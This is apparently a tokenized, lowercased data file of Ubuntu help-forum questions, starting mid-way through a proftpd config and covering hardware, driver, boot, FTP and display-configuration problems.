engine reduces impact of the so-called timing attack described in # http : //www.securityfocus.com/bid/11430/discuss # it is on by default . < ifmodule mod_delay.c > delayengine on < /ifmodule > < ifmodule mod_ctrls.c > controlsengine off controlsmaxclients 2 controlslog /var/log/proftpd/controls.log controlsinterval 5 controlssocket /var/run/proftpd/proftpd.sock < /ifmodule > < ifmodule mod_ctrls_admin.c > admincontrolsengine off < /ifmodule > # # alternative authentication frameworks # # include /etc/proftpd/ldap.conf # include /etc/proftpd/sql.conf # # this is used for ftps connections # # include /etc/proftpd/tls.conf # # useful to keep virtualhost/virtualroot directives separated # # include /etc/proftpd/virtuals.con # a basic anonymous configuration , no upload directories . # < anonymous ~ftp > # user ftp # group nogroup # # we want clients to be able to login with `` anonymous '' as well as `` ftp '' # useralias anonymous ftp # # cosmetic changes , all files belongs to ftp user # dirfakeuser on ftp # dirfakegroup on ftp # # requirevalidshell off # # # limit the maximum number of anonymous logins # maxclients 10 # # # we want 'welcome.msg ' displayed at login , and '.message ' displayed # # in each newly chdired directory . # displaylogin welcome.msg # displaychdir .message # # # limit write everywhere in the anonymous chroot # < directory * > # < limit write > # denyall # < /limit > # < /directory > # # # uncomment this if you 're brave . # # < directory incoming > # # # umask 022 is a good standard umask to prevent new files and dirs # # # ( second parm ) from being group and world writable . # # umask 022 022 # # < limit read write > # # denyall # # < /limit > # # < limit stor > # # allowall # # < /limit > # # < /directory > # # < /anonymous > # include other custom configuration files include /etc/proftpd/conf.d/
358846	problem with available memory-	loading ubuntu1 it tells me there is low memory . ( e.g . 200 mb ) analyser finds some 100 gb free memory ! what can i do ?
358849	ubuntu 13.04 on gateway nv57h44u turns monitor idle even when told not to	the screen is shutting off when power settings are not set to make it turn off . i am running ubuntu 13.04 on an gateway nv57h44u . for some reason my screen keeps going to sleep ( going blank ) after 10 minutes of being idle , but i have the screen saver turned off and i have the power settings set to never turn off or dim the monitor . i also checked to make sure that there was n't a setting in the bios that could be doing this and there are no power saving settings in my bios . thankz .
358850	dns server client’s requests	i have ubuntu dns server , how can i get report of my client’s requests in which domains that they asked for to can i make routing policy for performance tuning . thanks in advance .
358851	seagate barracuda disk problems with ubuntu 12.04	i have a seagate barracuda st31000528as . under ubuntu 10.04 it works fine . under ubuntu 12.04 i have repeatedly had disk errors and the drive spinning down randomly and taking 10s of seconds to spin back up again . does anyone know why this is happening and how to fix it ? the disk firmware is up to date . hdparm -i gives the following info : /dev/sda3 : model=st31000528as , fwrev=cc49 , serialno=xxxxxxxx config= { hardsect notmfm hdsw > 15usec fixed dtr > 10mbs rotspdtol > .5 % } rawchs=16383/16/63 , trksize=0 , sectsize=0 , eccbytes=4 bufftype=unknown , buffsize=unknown , maxmultsect=16 , multsect=off curchs=16383/16/63 , cursects=16514064 , lba=yes , lbasects=1953525168 iordy=on/off , tpio= { min:120 , w/iordy:120 } , tdma= { min:120 , rec:120 } pio modes : pio0 pio1 pio2 pio3 pio4 dma modes : mdma0 mdma1 mdma2 udma modes : udma0 udma1 udma2 udma3 udma4 udma5 *udma6 advancedpm=no writecache=enabled drive conforms to : unknown : ata/atapi-4,5,6,7 * signifies the current active mode attempting to disable powersave gives : sudo hdparm -z /dev/sda3 /dev/sda3 : disabling seagate auto powersaving mode hdio_drive_cmd ( seagatepwrsave ) failed : input/output error i have switched from 10.04 to 12.04 a couple of times . on reinstalling 10.04 the drive behaves normally .
358854	what option do i have if i get a kernel panic due to error in memory ?	i stumbled upon a kernel panic error trying to kill init . i checked using memtest and found errors in my memory i.e . ram . now i do n't want to lose my data . what should i do now ? thanks . ps . im not able to boot from live cd as well . so i cant provide any more relevant data . but i found that this is due to hardware problem but how should i proceed now ?
358858	ubuntu 13.04 is lagging on my asus laptop	i have an asus laptop with a core i3 processor , 4gb memory and an nvidia 540m graphics card , as well as an intel graphics card . i have just installed ubuntu 13.04 and it is lagging . by lagging i mean being non-responsive for a few seconds even while i 'm using the terminal . i have tried updating the drivers via apt-get but it did not do the trick . is ubuntu using the second intel graphic card and that is why the update did not help ?
358867	how to view the `.bash_history` file via command line ?	i want to view the contents of my .bash_history file but do n't know how to get there via the command line .
358868	what does cn mean in aria2 downloading info ?	after i used aria2 to download a link in it 's download link 's info there is cn:1 ! [ # 678707 16mib/22mib ( 73 % ) cn:1 dl:45kib eta:2m15s ] what does it mean ?
358869	lubuntu -- no sound , no adobe flash	no sound . no adobe flash in lubuntu13.04 . why ? ? works in win xp and ubuntu 12.04 computer compaq deskpro en processor : intel piii eb coppermine 1.0/256/133 socket 370 ram : 512mb pc133 north bridge : intel solano i815e/ep south bridge : 82801ba ich2 graphics : intel i752 ( agp ) —controller 82815—32mb audio : intel 82801ba ich2—ac'97 controller regards , sören
358880	how do i install ubuntu in uefi or load in legacy while windows is in uefi	i 've been trying to install ubuntu on my windows 8 laptop . i 've partitioned the drive created a ubuntu dvd and disabled secure boot options . when i tried to load the dvd the only option i got was to load it in legacy boot mode there was no uefi option . so i installed it in the legacy boot mode and now ca n't access ubuntu . windows seams to have been unaffected but i ca n't use ubuntu . ubuntu has installed i just cant load it in either legacy or uefi modes . i think this has come about from instaling it in legacy mode when windows is in uefi but i do n't know how to get around that and install it in uefi . i 'm not particularly good at working with bios settings past what i 've already done and do n't want to do irreversible damage to my laptop dose anyone have any possible solutions .
358884	how to supply the ssh keys needed to access an application repo with juju ?	our app is hosted on a private repo that requires an ssh key to access , and the node-app charm assumes that the repo is available publicly . is there a way to install the key automatically and securely ?
358887	ubuntu compatibility on dell precision t5500	i am using a dell precision t5500 which came pre-installed with red hat . during the course of time , the serial key for red hat was lost , due to that it is getting difficult to install or update the software . i am thinking to remove red hat and install ubuntu , before doing it , i want to make sure that the dell t5500 is compatible with ubuntu . will it work normally ?
358889	is there any command-line image/pdf/ppt ( powerpoint ) viewer that supports transitions ?	i was looking for some viewers that can handle displaying both pictures and pdfs ( ideally , ppts , but i reckon that 's asking too much ) , with transitions ( fade in , fade out , etc ) . on top of that , i needed a cli interface ( not gui ) . any suggestions ? edit : ideally i was looking for a single viewer , but if it ca n't be done then what are the alternatives ? right now , i 'm thinking about using fbi for everything ( that would include extracting each slide as an image ) . i do n't really like this solution , especially because fbi does n't really support transitions between each photo ( a simple fade-in would suffice ) . edit2 : i wanted to make a script that used these viewers , that 's why i wanted to avoid guis .
358891	ubuntu 12.04 repeatedly freezes ( have experienced thrice in one hour )	i am having this problem from the time . i have installed ubuntu 12.04 . it is installed inside windows , i do n't know if the problem is related to that . i am experiencing this sudden freezing/hanging , especially when i am using firefox . when it freezes no ctrl + alt + f1 will work and no ctrl + sysrq works . this is becoming a very bad problem for me . please help me solve this . i believe if i keep on directly restarting the computer , my computer may get damaged any time .
358892	why ffmpeg command producing error in ubuntu terminal ?	i installed ffmpeg using this command sudo apt-get install ffmpeg after the installation i tried this command in terminal ffmpeg but i got error message like this root @ client85-desktop : ~ # ffmpeg bash : /usr/local/bin/ffmpeg : can not execute binary file how can i solve this issue ?
358898	how to launch google-chrome/chromium application shortcut in fullscreen/kiosk mode	i 'm trying to boot a chrome application shortcut in full screen ( kiosk mode ) . launching as an application shortcut is straightforward by appending the command -- app=http : //website.com . but the kiosk/fullscreen mode -- kiosk or -- start-maximized does n't work . i 've looked up the commands through man google-chrome . i does n't look like the option exists . is this option hidden , or are there alternatives ? a way of starting chrome in fullscreen by default ? i 'm guessing that there is a way to fake a key press on f11 after chrome has started . though this really is n't an ideal solution .
358901	display problem in ubuntu 12.04 in vmware	i am running on a vmware and observe that a lot of times my text gets cut off as shown in the diagram and there no way i can access this . can anyone give me some solutions ? i have adjusted the resolution but it still doesnt work correctly .
358902	where are the screensaver settings in unity ?	why is there no screensaver in the default installation of ubuntu 13.04 ? i 've found that it can be installed afterwards , but i do n't understand why this feature is not present by default . has the concept of screensaver been replaced something else ? is there a discussion somewhere where i could find an explanation for this ? how do you install a screensaver ? does unity even have screensavers ?
358906	sshfs messes up everything if i lose connection	this is becoming increasingly annoying and borderline despairing : i use sshfs to mount directories from remote servers . i work in a laptop with a docking station so i 'm usually connected through ethernet . many times i need to grab my laptop and go work in another location using the company 's wifi connection . if i forget to `` fusermount -u '' all the different mounts , i need to restart the computer or at least logout login , which is very annoying and unproductive . when i say everything is messe up i mean : my console stops working if i do something as simple as 'ls' i ca n't unmount either through the console or the file browser consequently , i ca n't mount it again , therefore i ca n't work does anyone relate to this problem ? and know of a good solution ? thank you
358907	how do i install gfortran ?	i am trying to install gfortran in my computer with ubuntu 12.04 by using these commands , sudo -i apt-get update apt-get install gfortran but i found the program saying `` unable to locate package gfortran '' . then on a ubuntu page i found some question regarding the same problem and i went through the solution from them but again i could n't install the gfortran package . can anybody tell me how to install it ?
358908	ca n't reduce swap size	i 'm building my first ubuntu server and i 'm struggling with with the swap size . i have 16gb ram , however disk space is limited as i 'll be running multiple vm 's . that 's been said , i 've created a partition for the host machine with 20gb which will be more than enough to start with . however when i look at the logical volumes through webmin , the swap_1 volume has got about 15gb taking almost the entire partition for nothing . i 'm new to linux and did a my research in how do reduce/remove the swap but could n't get it to work . i 've added the following line vm.swappiness=0 on /etc/sysctl.conf rebooted the system and the swap size remains the same . also tried to switch swap off through the command swapoff -a but also did not work . i 'm a bit confuse with all of these thing as it is a kind a new world for me . anyone can help me out ? all i want is to have as close as 20gb as possible available on my partition . thanks
358909	how to install a lastest version of package ?	i have qt creator 2.4 installed from package manager , but version 4.8 is out now , and i want to try it . how to properly update to the lastest version , should i download and install it manually ?
358911	failed-disk full error when host partition shows more space	i am trying to download a windows image on ubuntu to install on virtualbox and i get a `` failed-disk full '' error when i do have more space . my host partition shows that i have only used 34 % but the /dev/loop0 filesystem shows 100 % . can anyone help ?
358912	how can i recover an unallocated ubuntu-installation ?	i use ubuntu as my main os and windows for gaming ( dual boot ) . after i reinstalled windows , it has , as expected , overwritten grub . i restored grub in similar situations countless times using a live-cd ( chroot , reinstalling grub etc. ) . however this time , my old ubuntu partition is unallocated and therefore , can not be mounted . is it possible to fix this ?
358913	no dropbox icon in the indicator panel ?	i have recently installed ubuntu on my machine and everything has been working fine , except i do n't see the dropbox indicator . i have installed and re-installed dropbox multiple times and can confirm that it 's running in the background ( with ps -e | grep dropbox ) . does anyone know how to get it back ?
358919	laptop : internal lcd does not get reactivated	hi i have a thinkpad t430 with an external monitor plugged into docking-station via vga . when i close the lid and reopen it , my internal display stays black and does not get reactivated . i 'm using a fresh install of an ubuntu saucy daily build .
358922	how to install ms combat flight simulator 2 in 12.04	just installed 12.04 on offline home build computer - completely new to ubuntu - would appreciate advice .
358923	trying to update skype in terminal and message pops up . so ca n't run sudo apt-get update or anything unless i fix that	e.malformed line 56 in source list/etc/apt/sources.list ( dist parse ) e. the list o sources could not be read my version is 12.04lts
358927	just installed 13.04 , but i ca n't save anything - says disk is full !	i just finished installing 13.04 as a virtual machine using vmware 6 . for some reason it says the disk is full , and i ca n't save any file no matter how small the change is . when i check the disk size using the native vista os , it reports 7.63 gb free on the partitioned drive where the vm is installed , and 4.47gb free on the main hard drive . i have previously used ubuntu10.10 installed in the same way without this problem . any suggestions ?
358931	ubuntu 12.04 , dell 5520 , broadcom device 4365 , wireless connection not working	i have installed ubuntu 12.04 on my dell 5520 . wireless connections are totally working fine in windows 7 . but in ubuntu wireless connections are not even displayed . i tried the following commands ifconfig eth0 link encap : ethernet hwaddr d4 : be : d9:43 : ef:70 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:43 base address:0x2000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:2104 errors:0 dropped:0 overruns:0 frame:0 tx packets:2104 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:143536 ( 143.5 kb ) tx bytes:143536 ( 143.5kb ) iwcofig lo no wireless extensions . eth0 no wireless extensions . lspci 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati thames xt/gl [ radeon hd 7600m series ] 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 08:00.0 network controller : broadcom corporation device 4365 ( rev 01 ) please anybody help me to get my wireless connections up .
358934	sending keypresses to remote x session over ssh	so i 'm sitting in our living room on an ubuntu laptop working while also watching a tv that is controlled by an ubuntu htpc . i have an ir remote set up and can control everything i need to with it , 99 % of the time . however text input on a remote is n't very easy . i do n't need to do it very often but when i do , it feels easier to walk 15 feet to plug in a usb keyboard and do it that way . however ... i 'm criminally and medically lazy and feel walking any distance is n't just unnecessary , it shows the robots they have won . no more i say ! i can ssh into the htpc fine ... now , how do i send keypresses to that remote computer 's x session ? i should mention that i know i could vnc but the tv is 1080p and the laptop is 720p so this introduces some scaling issues . on a technical level , i 'd rather a solution that gave me a way to temporarily turn the laptop into a remote keyboard .
358938	disable zend optimizer php 5.4	i am trouble-shooting an installation of anahita , which requires apc to be installed and zend optimizer to be disabled . i have php 5.4 running on a ubuntu 10.04.4 lts server . i 've been trying changes to the php.ini file , setting php_value zend_optimizer.optimization_level = 0 , but i 've seen no change in the status for the zend engine . i 'm now backing up to confirm i 'm working on the right php.ini , so i find the loaded configuration variable on php.info set to : /etc/php5/apache2/php.ini , which is the file i 've been editing . however , php -- ini returns the following : php -- ini configuration file ( php.ini ) path : /etc/php5/cli loaded configuration file : /etc/php5/cli/php.ini scan for additional .ini files in : /etc/php5/cli/conf.d additional .ini files parsed : /etc/php5/cli/conf.d/10-pdo.ini , /etc/php5/cli/conf.d/20-apc.ini , /etc/php5/cli/conf.d/20-curl.ini , /etc/php5/cli/conf.d/20-gd.ini , /etc/php5/cli/conf.d/20-mcrypt.ini , /etc/php5/cli/conf.d/20-mysql.ini , /etc/php5/cli/conf.d/20-mysqli.ini , /etc/php5/cli/conf.d/20-pdo_mysql.ini , /etc/php5/cli/conf.d/20-readline.ini the difference in loaded config file paths inspired the question , but i wanted to contextualize what i 'm working on as well .
358940	can not get internet/router connection after bootup , unless i reconnect . says it is connected	i am trying to figure out why i always have to disconnect and then connect to my wifi before i can use the internet or get a connection to my router . i 've tried with the gnome-network-manager and i had to disconnect several times before i could get a connection or i could use the hardware-wifi-button to disconnect and then reconnect again . then i removed the gnome-network-manager and installed wicd , because i heard it sometimes works better . now i still have to disconnect and reconnect , but only once . it never works the first time . the icon is green , it says it is connected , but i have no connection to either internet or router . this is getting really annoying , does anyone have any suggestion ? i do not lose my connection , as soon as i have one it works fine . ( i am using 12.04 lte )
358941	uefi boot - not dual	so , i made the mistake of buying a laptop with this uefi . i have no interest in dual booting windows , i just want to install ubuntu without the need of a degree in quantum physics . right now i can only get my laptop to end the installation , but at the next boot it will open up the setup bios and wo n't go further ... is there a guide to get rid of this problem ?
358942	unable to mount secondary harddrive	my primary hard drive is a ssd and is boot essential drive . i have a 1.5 tb hard drive ( hdd ) in my computer which is partitioned : 440 gb for my ubuntu as ext4 . today when i booted up i got an error . i chose to skip the mounting . then as soon as i logged in an error message pops up . ( see image a ) then i went to gparted to see whats up . i am not sure what the mount point is supposed to like like but everything else is fine . then i got to disks and i get another error . ( see image b )
358943	recover data and ideally program files from crashed windows laptop drive	vaio laptop windows 7 has crashed and no longer sees the hard drive in bios ( seagate momentus 5400.6 ) , so although i have the 3 windows restore ( /repair ? ) discs they are unusable . i can load vaio rescue basic and vaio hard disk verify/repair but they can not see any partitions to copy from . i have tried running ubuntu from the dvd , get language selection but then blank screen , machine goes quiet and back to language selection . i have removed the drive and am trying to recover from an external enclosure on a different machine ( vista if that 's relevant ) . i have tried ubuntu direct from the disc - on this machine i get screen corruption then error 8000 reading sector 824570 invalid or corrupt kernel image edd error 8000 reading sector 47586 . i have installed ubuntu desktop on the vista machine . this seems to operate fine , but i can not get it to see the external drive . ideally i hope to solve this in a way which maintains windows , ms office and data ( but not hopeful at the moment ! ) . lsblk name maj : min rm size ro type mountpoint sda 8:0 0 149.1g 0 disk ├─sda1 8:1 0 1.5g 0 part ├─sda2 8:2 0 74.5g 0 part /host └─sda3 8:3 0 73.1g 0 part sr0 11:0 1 1024m 0 rom loop0 7:0 0 6.6g 0 loop / geoff @ ubuntu : ~ $ fdisk -l geoff @ ubuntu : ~ $ disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x75dc365b device boot start end blocks id system /dev/sda1 2048 3074047 1536000 27 hidden ntfs winre /dev/sda2 * 3074048 159363071 78144512 7 hpfs/ntfs/exfat /dev/sda3 159363072 312580095 76608512 7 hpfs/ntfs/exfat geoff @ ubuntu : ~ $ geoff @ ubuntu : ~ $ dmesg | tail -n 50 [ 21.432705 ] iwlwifi 0000:01:00.0 : config_iwlwifi_debug disabled [ 21.432708 ] iwlwifi 0000:01:00.0 : config_iwlwifi_debugfs enabled [ 21.432711 ] iwlwifi 0000:01:00.0 : config_iwlwifi_device_tracing enabled [ 21.432714 ] iwlwifi 0000:01:00.0 : config_iwlwifi_device_testmode enabled [ 21.432716 ] iwlwifi 0000:01:00.0 : config_iwlwifi_p2p disabled [ 21.432720 ] iwlwifi 0000:01:00.0 : detected intel ( r ) wifi link 5100 agn , rev=0x54 [ 21.432850 ] iwlwifi 0000:01:00.0 : l1 enabled ; disabling l0s [ 21.635481 ] ieee80211 phy0 : selected rate control algorithm 'iwl-agn-rs' [ 22.310340 ] console : switching to colour frame buffer device 160x50 [ 22.315200 ] i915 0000:00:02.0 : fb0 : inteldrmfb frame buffer device [ 22.315202 ] i915 0000:00:02.0 : registered panic notifier [ 22.327012 ] acpi device:06 : registered as cooling_device2 [ 22.327116 ] acpi : video device [ vga ] ( multi-head : yes rom : yes post : no ) [ 22.328771 ] input : video bus as /devices/lnxsystm:00/lnxsybus:00/pnp0a08:00/lnxvideo:00/input/input8 [ 22.329626 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 22.329761 ] snd_hda_intel 0000:00:1b.0 : enabling device ( 0000 - > 0002 ) [ 22.329895 ] snd_hda_intel 0000:00:1b.0 : irq 47 for msi/msi-x [ 22.336803 ] init : failsafe main process ( 794 ) killed by term signal [ 22.398169 ] input : hda intel mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input9 [ 22.398498 ] input : hda intel headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input10 [ 26.058728 ] e1000e 0000:00:19.0 : irq 42 for msi/msi-x [ 26.160142 ] e1000e 0000:00:19.0 : irq 42 for msi/msi-x [ 26.160291 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 26.160843 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 26.163945 ] iwlwifi 0000:01:00.0 : l1 enabled ; disabling l0s [ 26.164543 ] iwlwifi 0000:01:00.0 : radio type=0x1-0x2-0x0 [ 26.225261 ] type=1400 audit ( 1381768439.847:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=925 comm= '' apparmor_parser '' [ 26.226037 ] type=1400 audit ( 1381768439.847:11 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=925 comm= '' apparmor_parser '' [ 26.226480 ] type=1400 audit ( 1381768439.847:12 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=925 comm= '' apparmor_parser '' [ 26.245324 ] type=1400 audit ( 1381768439.867:13 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=924 comm= '' apparmor_parser '' [ 26.245873 ] type=1400 audit ( 1381768439.867:14 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper//chromium_browser '' pid=924 comm= '' apparmor_parser '' [ 26.341819 ] type=1400 audit ( 1381768439.963:15 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/mission-control-5 '' pid=928 comm= '' apparmor_parser '' [ 26.342728 ] type=1400 audit ( 1381768439.963:16 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/telepathy-* '' pid=928 comm= '' apparmor_parser '' [ 26.350116 ] type=1400 audit ( 1381768439.971:17 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=929 comm= '' apparmor_parser '' [ 26.351062 ] type=1400 audit ( 1381768439.971:18 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/cupsd '' pid=929 comm= '' apparmor_parser '' [ 26.368590 ] iwlwifi 0000:01:00.0 : l1 enabled ; disabling l0s [ 26.369026 ] iwlwifi 0000:01:00.0 : radio type=0x1-0x2-0x0 [ 26.423071 ] type=1400 audit ( 1381768440.043:19 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/tcpdump '' pid=931 comm= '' apparmor_parser '' [ 26.507287 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 26.507799 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 34.850006 ] wlan0 : authenticate with 58:98:35 : c0:2b:79 [ 34.852819 ] wlan0 : send auth to 58:98:35 : c0:2b:79 ( try 1/3 ) [ 34.856557 ] wlan0 : authenticated [ 34.860053 ] wlan0 : associate with 58:98:35 : c0:2b:79 ( try 1/3 ) [ 34.863478 ] wlan0 : rx assocresp from 58:98:35 : c0:2b:79 ( capab=0x411 status=0 aid=4 ) [ 34.871093 ] wlan0 : associated [ 34.871133 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 63.922405 ] audit_printk_skb : 24 callbacks suppressed [ 63.922414 ] type=1400 audit ( 1381768477.540:28 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/lib/telepathy/mission-control-5 '' name= '' /usr/share/gvfs/remote-volume-monitors/ '' pid=1993 comm= '' mission-control '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 [ 897.526186 ] type=1400 audit ( 1381769311.145:29 ) : apparmor= '' denied '' operation= '' capable '' parent=1 profile= '' /usr/sbin/cupsd '' pid=805 comm= '' cupsd '' pid=805 comm= '' cupsd '' capability=36 capname= '' block_suspend '' geoff @ ubuntu : ~ $
358948	image -including unutu desktop and video images -covered by greeb strips blocks on a transperant background	i am using ubuntu 12.04 . i found out that the boot screen is not black but a green blocks of stipes with black background . later when ubuntu starts all images have a green stripes blocks on the image but this time the background is the image itself . that includes unity top panel and desktop image ! that happened i think after trying to install nvidia driver manually in debian 7 on the other hard disk in the same notebook . it seems that the basic image that the os is using is the same as the one i get when booting . i tried to find a solution by searching the net and the closest i could find is what is called frame buffer should be reset ! off course i tried to reinstall different linux distros but had the same result . i hope that someone may help to restore my ubuntu to its optimal performance and looks ! ! background for the problem the notebook is old from 2006 and had the blue screen of death on win xp also another dysfunction caused by something disabled the flash drives dvd . but when i did install ubuntu using usb flash 4 years ago there was no problem and things were smooth until recently got carried out by trying to use to install nvidia driver manually instead of nouveau in debian 7 toshiba qosmio-g30 nvidia geforce go 7600 -256m ram intel core duo 1.66 best wishes to you all side-show-k .
358953	how to change the on screen keyboard orientation ?	i recently install ubuntu developer preview 13.10 ( saucy ) onto nexus 10 . when i launch the terminal app i get the on-screen keyboard oriented in vertical direction to the terminal and not horizontal . this make very difficult to type and see the terminal . for browser app it is oriented properly . can somebody help me on how ubuntu-keyboard orientation can to made fixed or oriented properly with respect to typing .
358954	what do i do with the download of ubuntu-12.04.3-desktop-amd64 disk image file ?	what do i do with the download of ubuntu-12.04.3-desktop-amd64 disk image file ? all the very first instructions i could find do n't cover the very first steps . i do the down load and the file gets to my downloads folder . but then what to do ? i double clicked on it and window can up with option to burn the file to a dvr so i did . now what ? what i was hoping that the down load would be an executable that i would run that would expand or cause to down load the full one plus gig of the program . and that i would be able to direct that to be put on the sans chip .
358963	setup ftp ( vsftpd is not running )	-- update -- i 've noticed that my problem is because for some reason vsftpd does not run . even when i tell it to run via `` service vsftpd start '' . it says the process is running on some pid , but when i check that pid nothing is running . -- update -- i 'm trying to add ftp to my server . i would like only authenticated users to have ftp access . i also want to allow updating of files and not read only access . however for some reason things are not working . please note , i will be adding the user `` user_foobar '' . this is what i 've done so far : sudo apt-get install vsftpd sudo usermod -d /the/folder/that/ftp/should user_foobar i 've then updated the /etc/vsftpd.conf file with the following info : local_enable=yes write_enable=yes chroot_list_enable=yes chroot_list_file=/etc/vsftpd.chroot_list lastly i then edited the file /etc/vsftpd.chroot_list to have the line : user_foobar however when i restart the service `` service vsftpd restart '' i get the following output : stop : unknown instance : vsftpd start/pre-start , process 8478 also when i try and view the ftp site in chrome by the following url , ftp : //myftpsite nothing is shown .
358965	ubuntu 13.10 , nvidia optimus graphics card appears as a secondary display	there are many problems with optimus , but currently two main problems prevent me from logging in . first ; installing nvidia drivers via official repositories results in a blank screen during login . purging nvidia seems to solve this . second ; without nvidia drivers my nvidia vga appears as a `` secondary display '' . its resolution is much smaller than it should be . i ca n't find configuration files to modify those values . i need to find a way to use nvidia drivers and resize that `` secondary display '' . i 'm currently installing bumblebee to see if it still works . edit : using bumblebee gives following error `` can not access secondary gpu , secondary x is not active . '' edit2 : following this guide ( with some changes ) http : //tuxilero.blogspot.cz/2013/09/how-to-official-nvidia-drivers.html i was able to enable nvidia and now the only ( minor ) problem is that some features like hotkeys and themes are n't working . btw : i 'm using gnome 3 and gdm . unity and lightdm just show the error message asking for further actions ( such as run in low-graph environment or restore default settings ) .
358966	toshiba l75d-a7283 , ca n't get audio	when i try to play music , there is nothing coming out of the speakers , also when i try to use earphones , all i hear is a pop and then nothing , if anyone can help me please respond .
358967	how i can auto end specific process ?	how can i auto end a specific process when it reaches 400 mb ram ? and how do i change it back after i do that ? is there any program or script or anything ? !
358969	how to detremine why unrar is failing // file name restrictions	i installed ? ( at least i hope so ! ! ) unrar with sudo apt-get install unrar-free i tried from archive manager archive manager displays the existence of files inside the archive.rar after the `` extract '' command , it show as a dialog `` extraction completed successfully '' but nothing seem to happen , the extracted file can not be found i did a try with command line in terminal providing full path of the archive the result given is `` failed '' are there file name restrictions in place ? ? or maybe i make some other mistake ? is there another application able to unrar files / able to handle archive.rar using a graphical interface ? emma
358970	given a linux how do i find out its kernel version ?	given a linux how do i find out its kernel version , preferably using the command line ?
358972	sabrent usb-2011 ( displink adapter dl-195 ) / xorg.conf ?	i 'd really appreciate it if someone could help me configure my xorg.conf so that i can use my displaylink adapter for a 3rd monitor . i 've tried many variations and i know that i 'm close but ca n't quite find the right mix to make it all work . i 've done a lot of reading on this and feel that i have most of the pre-requisites in place for the xorg.conf file to be edited correctly . i have the `` green screen of success '' and if the adapter is plugged in during boot up , the ubuntu loading screen displays on the third monitor temporarily , on shutdown i have scrolling text on that screen as well . additionally from the login screen i can ctrl + alt + f1 and run a shell on the displaylink screen . this also works when booting into recovery . once logged in the displaylink adapter screen freezes with the previous image . i know that it means that linux is recognizing the device . current setup : comp : asus g71gx / ubuntu 13.04 with an additional 22 '' sceptre monitor connected via vga video card : nvidia geforce gtx 260m w/nvidia-304 drivers . i have the 310 , 313 , 325 & 331 drivers available as well . kernel : 3.10 blacklist-framebuffer.conf i 've also added blacklist udl and have tried both blacklist udlfb & # blacklist udlfb , none of which have worked for me . edit /etc/gdm/init/default this file does not exsist for me so i can not add gdmwhich ( ) { ... . } xrandr=`gdmwhich xrandr` if [ `` x $ xrandr '' ! = `` x '' ] ; then $ xrandr -o 0 fi sysresources=/etc/x11/xresources current xorg.conf ( what my xorg.conf is from installing nvidia drivers ) section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' 